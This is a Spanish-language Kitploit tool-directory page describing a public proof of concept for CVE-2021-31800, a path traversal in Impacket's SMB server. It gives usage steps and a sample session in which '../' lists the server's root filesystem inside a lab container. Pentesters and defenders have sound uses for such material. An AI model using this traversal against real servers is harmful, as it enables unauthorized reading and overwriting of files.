Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write — Una vulnerabilidad de path traversal en smbserver.py permite a un atacante leer/escribir archivos arbitrarios en el servidor. | Kitploit
Herramientas/GitHubGitHub/p0dalirius/cve-2021-31800-impacket-smb-server-arbitrary-file-read-write
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosPruebas de Penetración
GitHubp0dalirius/cve-2021-31800-impacket-smb-server-arbitrary-file-read-write

CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write

Una vulnerabilidad de path traversal en smbserver.py permite a un atacante leer/escribir archivos arbitrarios en el servidor.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
Sitio web
111hace 3 añosAún no revisado

CVE-2021-31800 - Servidor SMB de Impacket: lectura/escritura arbitraria de archivos

  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
  • Puntuación CVSS: 9.9 (Crítico)

Descripción

Un path traversal en smbserver.py permite a un atacante leer/escribir archivos arbitrarios en el servidor.

Explicación detallada de este problema: https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/

Uso

Inicie el entorno de exploit escribiendo make dentro de ./exploit_env/. Luego puede usar una versión modificada de smbclient.py para obtener una lectura/escritura arbitraria de archivos mediante un path traversal.

Luego puede usar ../ para moverse por el sistema de archivos y leer o escribir archivos. Aquí hay un ejemplo:

root@kitploit:~
# smbclient.py 192.168.1.27
Impacket v0.9.23.dev1+20210422.174300.cb6d43a6 - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# shares
IPC$
SYSVOL
# use SYSVOL
# ls 
-rw-rw-rw-         10  Sun Jan  8 23:59:59 2023 test.txt
# ls ../
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 sbin
drw-rw-rw-        360  Sun Jan  8 23:59:59 2023 dev
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 sys
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 media
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 srv
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 opt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 tmp
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 var
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 bin
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 root
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 usr
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 mnt
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 run
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 boot
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 etc
drw-rw-rw-          0  Sun Jan  8 23:59:59 2023 proc
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 lib64
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 home
drw-rw-rw-       4096  Sun Jan  8 23:59:59 2023 share
-rw-rw-rw-          0  Sun Jan  8 23:59:59 2023 .dockerenv
-rw-rw-rw-        142  Sun Jan  8 23:59:59 2023 entrypoint.sh
#

Demostración

Para demostraciones, puede iniciar el entorno vulnerable escribiendo make dentro de ./vulnerable_env/.

Referencias

  • https://checkmarx.com/blog/cve-2021-31800-how-we-used-impacket-to-hack-itself/
  • Comentario interesante: https://github.com/fortra/impacket/blob/fea485d2e4a53e9c26c02678237df1fc6621b5f4/impacket/smbserver.py#L16
Descargar herramienta